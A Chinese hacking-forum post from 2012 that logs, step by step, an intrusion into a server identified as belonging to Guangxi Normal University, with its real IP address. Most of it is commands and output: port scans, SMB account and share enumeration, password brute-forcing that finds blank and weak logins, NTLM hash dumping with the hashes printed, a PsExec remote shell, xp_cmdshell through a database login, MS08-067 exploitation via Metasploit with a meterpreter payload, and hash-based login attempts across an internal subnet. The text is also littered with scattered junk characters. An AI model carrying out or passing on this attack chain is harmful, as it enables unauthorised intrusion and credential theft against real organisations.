找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2922|回复: 0
打印 上一主题 下一主题

nmap+msf入侵广西师范

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 12:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
广西师范网站http://202.103.242.241/  _8 Y& i2 I5 D  M
* v( @. M$ ?- p" V. a5 l# Z8 h
root@bt:~# nmap -sS -sV 202.103.242.241
4 \( B; [2 Q4 Y$ \, T0 z9 r( ~9 n  d& T5 T" W2 z* y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
, C' Q( A7 j( Q2 K; c/ H1 }; M6 [8 D  n5 t
Nmap scan report for bogon (202.103.242.241)2 c1 }- O: ]+ n+ `

9 V$ B7 h  x5 n3 y" u3 gHost is up (0.00048s latency).9 T" |  w  `2 U2 w- @

" y0 J; k) R- A0 c: v9 ONot shown: 993 closed ports
  D4 c$ H- K9 x
1 E. e- t0 L. H/ ]: S8 \0 T0 {PORT     STATE SERVICE       VERSION  A$ h  [  ]) d1 W8 p8 {3 A7 q- [
" e6 _- y, V+ w
135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
. R1 n0 D# W* {* {# p2 }! g2 _1 f  m3 l( J; S4 S9 Q
139/tcp  open  netbios-ssn" t% E% X0 ]- ]- g

; T  W: O% q. h$ w6 x4 t445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
% {$ h, E. e( u! R7 f$ m+ g6 v4 B
/ J. ^( a$ L5 H1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)* V# q" C" F, m; p" F6 S! \
0 K* f: n4 I( h5 z
1026/tcp open  msrpc         Microsoft Windows RPC& n6 e5 A5 c6 L( c0 R! l9 ]* d0 W

) }1 Y- O3 @; {  b3372/tcp open  msdtc?
; y# C$ j4 E# X7 a- e/ `' h
. L1 L* i4 U2 z" w& N" z4 x3389/tcp open  ms-term-serv?
$ G) a7 ?1 g: V4 M! Q, g$ t- V7 e, R, f1 v: L& u
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
; r6 X0 `5 k7 d  |( [SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r6 T) d7 r' D6 H" i$ n& a
7 X/ f% Y/ A: a1 |' V8 U% |
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
" @- u! g' a! Q' L) l  w( Z8 ?. q# W
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
  _5 H; ]1 X. u9 g6 q4 X1 [, S" y5 J1 n
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO. [/ d6 k' A9 H- O" t: P

6 K0 r- [, S& {1 E4 cSF:ptions,6,”hO\n\x000Z”);3 W- x, ]- q- p) G
2 }! B% {2 l% l& K# u
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& K6 d) i# ]4 X3 y& G
8 F0 M0 s8 c& lService Info: OS: Windows- c" J3 @8 S9 t% @7 q
5 H7 ]* M6 S8 M$ Z: l$ {
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
) p0 f9 }" r& J+ `- q# j6 l2 C- H4 s! n
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
2 P" E: Q. Q3 _  J( r" @  N! U. o# t
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
* @* i4 j1 f/ d) `' N: ]. ?# c2 f; s4 @( Y4 Z) R6 o
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse" r5 m2 \& k; R- o

. I3 V2 J! w' y+ p: @1 H1 Q-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse; f0 _! F; b5 \* a2 C8 G  z
# b% r& x1 N* r3 Z+ C
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse" D  d: E" S* ^6 G4 x, C$ p0 w
5 t# _( P, j8 x5 e1 Y( i
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
/ u, Z9 D( ^+ j# z, o+ z* b6 _% ^0 H& m( M6 p
-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
. P# C9 u0 {0 s/ T, S8 m, |9 O* J' y
4 Q1 U% l% f3 n-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
: p' k4 M# ^% T; ?0 U7 f+ o$ K/ K( Q* H0 v0 L
-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse" O$ \) W0 @5 Q' a3 e; l3 G
2 M6 A( k6 J% s5 Y# T
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse( J& h& m2 a5 ^2 z* Q, i

$ C3 K* J% {1 A8 C-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse( R% H( @2 Q5 I+ ~

: R9 R  ^% B6 e) I  F+ x-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse1 ]5 r# ?1 x7 B3 D! M' w; q
9 F" ]4 {7 @+ ~7 ^/ X3 R0 \& P
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse6 v5 t0 E( H  ]6 o: {) L
' o2 k% Q) s. m% n' [
-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
% l2 \& ?! |/ M) e' Q7 @! I
7 W2 a/ P) Z3 J3 j8 G- r2 _-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse3 R& y/ ?9 g6 h9 q; Q

7 ^1 b- h( f6 L* `7 B-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
: m: i! j6 B: S6 }& F- g. q, ~
& |) N) n6 F: @3 _! c+ U2 E5 ^-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
. S. S. c& ]/ |6 P$ U# _' j  o; v8 Y: s9 q/ ^
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
$ ~) O- _  n6 i) d# b' R/ O, j# K1 W, E. Q$ s0 h# {6 ^7 e: L
//此乃使用脚本扫描远程机器所存在的账户名
0 _# Q. z* o1 p, B5 H2 c
  Y2 Z: ^% o% K- _8 SStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST! |3 v* b, o& Z( j) C0 O% S! b

1 Q4 n+ q- v, C3 QNmap scan report for bogon (202.103.242.241); p# P8 a7 j' k. K: k) l0 L0 k+ B
: X) [, T6 r7 K# f. T
Host is up (0.00038s latency).' G/ |5 R0 t) F' u, l2 n

, j# C5 c' M; b  N5 I% \3 V' F- pNot shown: 993 closed ports4 f- h# \. ]8 v8 n) O7 X

1 c6 W0 B. W' b7 qPORT     STATE SERVICE; R5 ?% M7 S3 ^) h4 T
& U3 j. Z0 _( p2 b1 v3 _( p
135/tcp  open  msrpc
! K0 h3 Q; T7 F2 l. t1 E: n5 R7 t  `7 h
139/tcp  open  netbios-ssn
7 J2 u: J: g; U/ D
7 q1 Q' {) m+ m* S5 e$ m# L445/tcp  open  microsoft-ds
; }* R& W6 `% k! e8 z, V
& r. \" P( w0 \, @$ }7 |; [1025/tcp open  NFS-or-IIS
+ C' ?$ ~* t+ Q  E. _% b6 c! h, e' n
1026/tcp open  LSA-or-nterm( Q/ }) x, {9 i- M( V* ~7 F
" s) F' `3 s* n' g
3372/tcp open  msdtc7 c+ q& T6 N( j) X8 U! b" Y2 X

0 |  X  a) O* a* P3389/tcp open  ms-term-serv$ t. @( I  l# Q- N# i

" t2 q+ |6 B+ }) c3 b, NMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
$ o$ C) M7 z: {- K
/ F/ D5 l/ `2 X$ vHost script results:9 q- i: s; Y0 l0 U& j8 w
3 b1 E* ]* D" X( a) r) k
| smb-enum-users:
( l3 }: H# a2 v# F0 P7 z
0 W7 C2 ~0 B% d|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
0 S$ c" y( Q/ L. a9 Z
& ~0 ~; J9 I2 @7 l& ^  U# \9 h! C0 |Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds" ]2 B6 F+ Y% J+ S7 w
; W* @8 i3 ~/ t- i0 r
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 / A6 w+ E- a( l. e0 y
/ F4 N2 r; w1 h' S
//查看共享
2 q* M& _" k! I
  A' |2 Y# K, gStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
8 s9 s# c3 l: w% [3 A3 U- C) R, W
: k; \7 o' S; g, _Nmap scan report for bogon (202.103.242.241)
9 J5 J5 F6 E; f( g
, K2 [: e4 n1 R% ]3 B( c7 WHost is up (0.00035s latency).
1 V' y' C. j* v& b; r$ m7 i1 h
2 T  h: C7 B& Q* ~; `Not shown: 993 closed ports8 [. ^1 p9 w5 U# Y' i6 `
8 D$ |. [, k' p6 L' _0 R6 Z& \  V0 s
PORT     STATE SERVICE8 a' z# s$ p& |' W$ y1 a) G) M

' `  W0 k0 o/ y0 ^135/tcp  open  msrpc1 n7 U0 U4 j' F1 {

& Q. j) Z5 ^& A- g139/tcp  open  netbios-ssn
# N6 G: N0 S1 R2 H) _5 z9 _
9 j- v* Y2 F* G2 y, q$ o: U) S6 j445/tcp  open  microsoft-ds
9 x6 m0 u5 [! p7 D' P9 }0 l" m1 p
1025/tcp open  NFS-or-IIS0 C  s. @4 x. z2 k; C& U. S

: w9 f, c; t: W0 Z7 s+ _2 E1 ~, l1026/tcp open  LSA-or-nterm! p: q7 D% |- V& x1 H8 w

8 |4 L  P. O* l3372/tcp open  msdtc
( I7 w4 R( c6 j3 u% a: }) F6 F! l9 O
3389/tcp open  ms-term-serv: x- O, a2 ^7 `/ L3 z" w- a

8 ~% [' m5 z5 MMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% Y/ i5 Z: D% I( M) _9 U# H( }. a+ w/ t
Host script results:+ E( D% T" z3 d" s! @- V1 B

% F4 E$ M# f. R, l0 a. q- V| smb-enum-shares:
& i1 i, `; F0 C4 |- P' k8 e* H7 G; D
' Y* Y* d6 W) u! _0 K2 c  \& [+ K|   ADMIN$: r( w! l9 {4 x% W: Y1 {$ |1 b9 H

. f) K# D8 \4 I|     Anonymous access: <none>" y$ ^7 q' v) F- f

- U) f5 ~1 J0 n3 h|   C$
0 t% I2 ?( B2 \- _0 f% H5 b! {9 y8 d# t# Y$ S$ E
|     Anonymous access: <none>3 l& j6 d3 c) X4 n; x
- Q# K- N5 ]  }1 N) w+ k
|   IPC$# z4 G& s( E5 r
, C& E, G! J1 C; Z
|_    Anonymous access: READ, R( T& [* s) Q( B

2 j  s# A6 f, w3 d( P+ [( U1 C' INmap done: 1 IP address (1 host up) scanned in 1.05 seconds
2 V" V) V" m* I  {+ L* J2 o
( k6 w9 L; g' z$ @root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       3 u  x, a! D& b' `' ~. `; o, h

# {$ X# X. F  D  R//获取用户密码; M8 I2 W" s1 }6 e+ ]0 K; ~- ^
+ e: i8 S5 E; U
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
2 a) I/ t3 I7 W) d4 Z3 U7 i& r6 y9 j) I" z) S- P
Nmap scan report for bogon (202.103.242.2418)
9 Y& d% m, b2 ?: H  o6 s$ u7 T3 \) U6 @- U
Host is up (0.00041s latency).% n+ Z0 [. v  u* ~: ]
* w$ g; c) q& C& z1 w
Not shown: 993 closed ports
. N# a3 r" _. D$ v1 }% l7 Z3 K& }" X- O  u( n) V
PORT     STATE SERVICE
2 W1 n2 c% @" ~2 h  L, X' k  t* X/ a7 t9 _  C
135/tcp  open  msrpc
1 H7 Q  b1 u, h, U9 {$ p
9 Q/ F9 a3 [9 v9 a$ e139/tcp  open  netbios-ssn8 V6 S* L+ g7 ?! c

: Z+ c, w) j1 z4 e445/tcp  open  microsoft-ds
+ C: t8 N9 Z0 [/ X/ e+ D
* y3 {0 p: h0 a1025/tcp open  NFS-or-IIS2 X7 D& C  L* o( g9 f

3 e2 l% j( [0 o+ B) w1026/tcp open  LSA-or-nterm
+ p" m# g2 A+ a2 B$ y. _/ Z% G3 P3 l* L  n( w
3372/tcp open  msdtc
1 o3 ]9 r  u; _/ d) v, }- Y% d5 j& p3 |7 m2 }3 W/ Q6 V& {  I
3389/tcp open  ms-term-serv, \) v) _" Q! g3 W

7 Q: j$ Y" {5 z1 Z/ X" `MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 D& g- [! ?6 X3 }# k" }
8 C7 l8 H% [: L/ n; L
Host script results:
3 {# G' z9 G  e. o& J- `* L
( r# G8 g- k: p$ z; \| smb-brute:& X# v) {; `+ r; v1 F6 u8 L
, k" ~% [+ ]0 g4 V4 `1 u1 Q
administrator:<blank> => Login was successful
" W8 E- x; g. P* J: v
9 v; d$ }% y! L/ d1 b: `1 l9 _|_  test:123456 => Login was successful$ }- i) V1 L- d9 }, C
* P6 C# m' _* q5 F
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
! M# K# V# u: o; R' t3 e4 x
! a! Y- v5 w6 N8 ?root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash0 \: S3 a' N2 F& D3 v5 F
& \7 F  o( C  `+ @( a% h
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data: }  S2 {$ W! F) N/ G2 E* u
) ~* Q. ]# b  S; }- c* s
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
. \. f- [+ e# f1 @8 c2 D4 Q- X" j6 p
0 L1 |2 H; Y. O5 Y( ~root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1399 _, r, t) }+ z5 G- R

5 }; T, k& n9 [Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST* H" ~- \  l+ o/ ~" N% H3 H! x
# `1 {* @/ ?! }# E! r
Nmap scan report for bogon (202.103.242.241)
# ?3 K* r9 F* F8 l& a  v* }* B4 z7 T6 [  S1 G1 a7 a% [( b  C
Host is up (0.0012s latency).
- L  t! E: l1 ^7 ]0 f* D7 s& U. c1 L! x  Q6 ~- ~6 h
PORT    STATE SERVICE$ a9 ]+ _0 c& E6 v: \, ^

* S- ]1 G3 _- @- Z4 e( g/ l- a9 [135/tcp open  msrpc
0 G- K' {1 _3 H) D1 G$ ?6 y! E6 [- M2 ~+ g' x* z" e8 p
139/tcp open  netbios-ssn4 h5 v8 E! M: R8 I

1 H4 {' x1 }# s2 ]' h445/tcp open  microsoft-ds2 p0 Y. a- I  M; ]2 e& @
; d) l  S6 A6 `- P2 ~1 n
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
, C. ^, n' O, S- f# B
  |' W$ B6 l* Y1 Y5 O- FHost script results:
/ E# A1 a5 @$ {6 E; Y( k- D: \' r
| smb-pwdump:
5 A' u9 f/ y" r0 _/ S) ^$ A( Z. C# k3 E7 J# h$ L
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
' s+ _: E; B. i, F! t
0 O; S/ e& _3 Q/ z' h| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
/ i0 N- H7 c& w4 e4 f0 X6 v- ~
1 A1 S, ?3 V8 S. U+ P| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
1 {. @4 f6 `1 ]% n: T+ R, t8 O3 f+ h
8 C. L( ]5 y" d|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
" A& R* x/ F4 a4 t7 x
0 n  Z2 T2 W0 l8 g5 D) N$ @Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds. H3 ?) U: R9 M- ?

) j0 i" t4 V$ M1 V; R$ D0 YC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell4 m( D4 D1 Y! R1 I
) K5 ^/ g2 k/ T$ e  e
-p 123456 -e cmd.exe
" Q9 ^* }, n/ R. [6 K1 `' I6 ^2 r& b- W% T
PsExec v1.55 – Execute processes remotely& }5 q# ]6 S$ o" A, `

" C* D" E* C" g" r8 V. r' @5 _Copyright (C) 2001-2004 Mark Russinovich4 R: r$ c- n) g

1 G" ?4 e; L  Q0 KSysinternals – www.sysinternals.com
$ }+ w" m+ }$ j6 V: y& `) d! T; r' ^; n& h( b
Microsoft Windows 2000 [Version 5.00.2195]
5 A( u0 b+ J+ e, @. f  q+ @/ S" J: V; q: D+ k& E8 r
(C) 版权所有 1985-2000 Microsoft Corp.* S# N7 k+ ~" g  h/ t4 f0 L
( ]  z& n' F* o; {8 ]
C:\WINNT\system32>ipconfig( F9 v! f6 ]. ~- G

6 _: N& e$ e3 y2 V  h/ gWindows 2000 IP Configuration
+ s* ]9 N- n( m0 }
4 [: {: C- Y& e) v7 v3 ?Ethernet adapter 本地连接:' F" h8 A& t# l6 }' J
, y0 a# ~+ P/ s! w5 R" }. P' `3 n, ]
Connection-specific DNS Suffix  . :' M+ U/ W4 F! b. |! @% y
7 ]( U& O: M. |9 M( u
IP Address. . . . . . . . . . . . : 202.103.242.241. v! u1 R; [: q
' A; z6 w8 n4 J3 c8 J
Subnet Mask . . . . . . . . . . . : 255.255.255.0; Y% z% U9 x5 X$ `+ L( }
$ Q0 j1 B3 ^* X" |2 ~! B
Default Gateway . . . . . . . . . : 202.103.1.1
& x% V$ @% l' Z  W3 X& c) z  o# O$ p" W
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令
! o/ n/ U1 t' E, v! C& f4 U5 J6 H% Z3 ^3 B. R6 `3 T
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞! `% c* o8 d% c' e4 ]" \# i+ a

7 [3 Y4 Q# z& L" K2 f( o8 g. X" UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
8 R( u. o7 o9 J' a- m. \3 m( _
8 o) ^( |3 }# j; k: i+ wNmap scan report for bogon (202.103.242.241)
+ I6 T( J6 e  V3 N; a; y; v& I+ p9 T1 A/ w0 p& k1 a  F8 }' u; K' Z
Host is up (0.00046s latency).
4 r. d. m' E) U7 h' `* N
( N6 n  @1 I& R0 c: x7 s# \( ZNot shown: 993 closed ports* x8 R& h) `6 B: p
. e2 P7 p6 f9 @: `7 C7 E$ o& u
PORT     STATE SERVICE6 F& v5 Z3 g+ i6 Y5 G' w
/ m! o% m/ {! k
135/tcp  open  msrpc$ `% o/ O/ j6 ~
$ s8 Q/ Y8 j2 X2 I" {$ X
139/tcp  open  netbios-ssn5 B3 q/ x1 v  N3 ?" ~/ E
' K* W( _) N/ }8 ~# Y
445/tcp  open  microsoft-ds
6 [) T& l! C0 v( s" Y7 i* T* G8 E1 _& c" i- P; G. ?6 N
1025/tcp open  NFS-or-IIS# p; D+ [2 ~& @6 d1 ~
3 F- ]  T. F5 Q9 Z- P
1026/tcp open  LSA-or-nterm5 M& b9 l  F% r1 G8 o- g  o2 p

' t5 A% s; L, N/ w* I/ `3372/tcp open  msdtc
( _' h& [/ {! o- E/ k
! N, S' g1 k2 \3 Z1 c3389/tcp open  ms-term-serv
" ~: {) \  G# ]1 Q' D
' u, n8 u+ G* _% @MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
; E- T2 x0 a! E, x+ d* @
5 ]6 I' K4 n  P8 [& T! AHost script results:
) X( g. x' C( f1 v  ~$ e& N& i
+ x( ^& H; E0 j$ h| smb-check-vulns:
8 ]) Y. Y' y7 y! N7 Q/ M4 l
; C" c! B7 h4 d9 a& C|_  MS08-067: VULNERABLE+ K1 r; D! s7 C6 Q

- ]) [8 E/ M3 w9 JNmap done: 1 IP address (1 host up) scanned in 1.43 seconds2 c+ M8 {6 F7 R3 R/ @1 }: v
% h1 T: s) M+ t! A  E' c+ n
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出0 Y( a4 U8 u1 `$ @# b
9 z! C$ Q5 \5 ^. [/ I/ k3 {. _
msf > search ms08
' W& w1 M6 G- B' ]; m! s6 [& b8 ]: s& N0 ?: ^9 G8 L- t# I2 C
msf > use exploit/windows/smb/ms08_067_netapi; k0 n7 c6 T8 N

% S% {% G% Z3 M6 amsf  exploit(ms08_067_netapi) > show options
/ z4 ]4 k# _2 a, I5 N  q. [6 r; p! S, C0 n; i, U+ I
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
+ L5 ^2 j- D) }/ \* F' H
2 x: w& C$ F( J/ \+ qmsf  exploit(ms08_067_netapi) > show payloads% Z- T8 m1 j2 b+ P: Y: z. q

9 g* T& f$ x$ A# K1 \msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
7 ]+ A1 c3 R, \& ]" X5 \9 j- V
1 e; O' N- p( L) {/ B# W$ X. tmsf  exploit(ms08_067_netapi) > exploit
, h9 ^, L" d1 {
6 Z; c$ D* @' W# s+ Pmeterpreter >
  S) Y$ e% v+ `/ \6 j( k+ \
" C# E7 k$ I& A; B4 zBackground session 2? [y/N]  (ctrl+z)3 v. s* V2 m7 L. m5 S! g$ V" g! h
7 F4 Q; a* c$ m
msf  exploit(ms08_067_netapi) > sessions -l
( Q! y! \2 M! }, Z6 F0 o# c% ^" L% |
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
' @& m$ J5 H7 U
/ }. ^# X* I+ t6 @( @test6 y$ b0 N# e/ }& k: i2 e  b

. K2 P% V( d' ^' x5 [  }administrator2 A6 C( ?( w! T" x% E+ L  u
- I# `1 j* Z- ~6 Y( i, s* x5 ?0 X
root@bt:/usr/local/share/nmap/scripts# vim password.txt
4 _% M8 t3 W, i1 F0 Y- Q0 Y# N1 k, _4 s" Y& e4 A9 ^; K
44EFCE164AB921CAAAD3B435B51404EE
1 E3 c6 X, G/ B$ q0 Y3 ]3 U) k! G' T; A0 S/ X, z
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
9 }" s5 T, {- P" _) T$ o3 P* U5 o. t0 t" B" x
//利用用户名跟获取的hash尝试对整段内网进行登录
& S* j3 s. H. G8 i& g4 ?; l
) W% U6 b) g: k1 c4 mNmap scan report for 192.168.1.105. F" X. V* p& g! K* _! ~  v
+ T) f6 P3 X2 `
Host is up (0.00088s latency).; ^4 U4 a* ~. E! V

$ K" \6 p( }9 W! A2 XNot shown: 993 closed ports
2 Y; Q( H( I, X) d
" e: U1 _8 J# a- [" N* V; o( HPORT     STATE SERVICE
' V8 f4 _, i; }& z- M
& @3 [: \; k0 E( V. U* {135/tcp  open  msrpc- u; N% B! ^( C
9 k/ w, ~% W4 v2 G% h2 i
139/tcp  open  netbios-ssn
3 v6 W: x7 }/ {" m% W$ x4 q% N: x) p4 v9 N5 V/ T" K9 E9 L" J
445/tcp  open  microsoft-ds
( u. s/ F( ^$ h* L3 i8 [
9 e; b  t6 K0 C8 i$ s1025/tcp open  NFS-or-IIS
; O4 \! `; G7 y  ^
' f3 m( u' L0 q1 v1026/tcp open  LSA-or-nterm  \3 ~+ {7 ]% X! y, O2 `  g9 S% J
( j8 Q2 y2 n: ]  n8 V* @$ S
3372/tcp open  msdtc
6 T, R2 j! b& T/ Y
6 g+ G/ j1 ^4 u) [: f5 C% }3389/tcp open  ms-term-serv
7 e6 A: c3 j$ C0 O
( ~9 I: O% o) v: W+ O  |! eMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems), c- X& b. p( T2 ]2 k( }" Y+ C4 N
) I$ _# g$ s5 B
Host script results:: v. L& E0 o  Q6 @6 a

: T' b1 C- M2 S6 ^5 K3 M| smb-brute:& x( a/ E9 K* W3 L- [1 }/ Q/ V
. i6 R- z5 v+ }! l7 f
|_  administrator:<blank> => Login was successful
' b" P& h7 l# Z6 L7 |* B  ~( Z; m; z
攻击成功,一个简单的msf+nmap攻击~~·
" b3 s/ t* e6 X  k# Q3 Z3 s7 F. G) h' S8 Z, k4 _6 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表